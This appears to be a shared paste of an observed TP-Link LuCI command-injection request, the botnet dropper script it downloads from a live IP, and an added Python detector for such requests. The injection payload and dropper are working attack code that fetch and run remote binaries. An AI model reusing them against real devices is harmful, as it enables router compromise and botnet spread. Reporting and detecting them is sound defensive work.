
Untitled

a guest
May 17th, 2024
Bot sniffing traffic with requests similar to:

http://IP-ADDRESS:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F147.78.103.155%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)

-------

The file downloaded from the wget command is this:

#!/bin/sh
n="arm arm5 arm6 arm7 m68k mips mipsel powerpc sh4 sparc arc"
http_server="147.78.103.155"

# send tmp-rw directories
cd /tmp
cd /var/tmp
cd /tmp/tmpfs
cd /dev/shm
cd /var/run

for a in $n
do
# download and execute
wget http://$http_server/rib/la.bot.$a -O -> dvrLocker
chmod 777 dvrLocker
./dvrLocker tplink.$a

# remove new binary
rm -rf dvrLocker
done
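
Added example, not part of the original paste: a Python check that flags request targets shaped like the one above (the luci `locale` endpoint with `form=country`, `operation=write` and shell metacharacters in `country`) and extracts any URL the decoded value references. The function names, the metacharacter set and the two benign sample targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate country value never contains these characters.
SHELL_META = re.compile(r"[`$;|&<>(){}]")
# URLs embedded in the decoded value (where a second stage is fetched from).
EMBEDDED_URL = re.compile(r"https?://[^\s;`)]+")

def inspect_request(target):
    """Return a finding dict if `target` (full URL or request path) matches
    the request pattern quoted in the paste, otherwise None."""
    parts = urlsplit(target)
    path = parts.path
    if not (path.startswith("/cgi-bin/luci/") and path.endswith("/locale")):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("form") != ["country"] or params.get("operation") != ["write"]:
        return None
    suspicious = [v for v in params.get("country", []) if SHELL_META.search(v)]
    if not suspicious:
        return None
    decoded = suspicious[0]
    return {
        "path": path,
        # ';stok=' directly followed by '/' means no session token was sent.
        "empty_stok": ";stok=/" in path,
        "decoded_country": decoded,
        "fetched_urls": EMBEDDED_URL.findall(decoded),
    }

def scan(targets):
    """Inspect every target and return only the findings."""
    return [f for f in map(inspect_request, targets) if f is not None]

SAMPLES = [
    # Request target exactly as quoted in the paste.
    "http://IP-ADDRESS:80/cgi-bin/luci/;stok=/locale?form=country&operation=write"
    "&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F147.78.103.155"
    "%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)",
    # Constructed: same endpoint with a plain country value and a token.
    "/cgi-bin/luci/;stok=0123456789abcdef/locale?form=country&operation=write&country=US",
    # Constructed: metacharacters, but not the luci locale endpoint.
    "/index.html?country=$(id)",
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

Only the first sample is reported; the decoded `country` value shows the full shell command chain and the URL it downloads from.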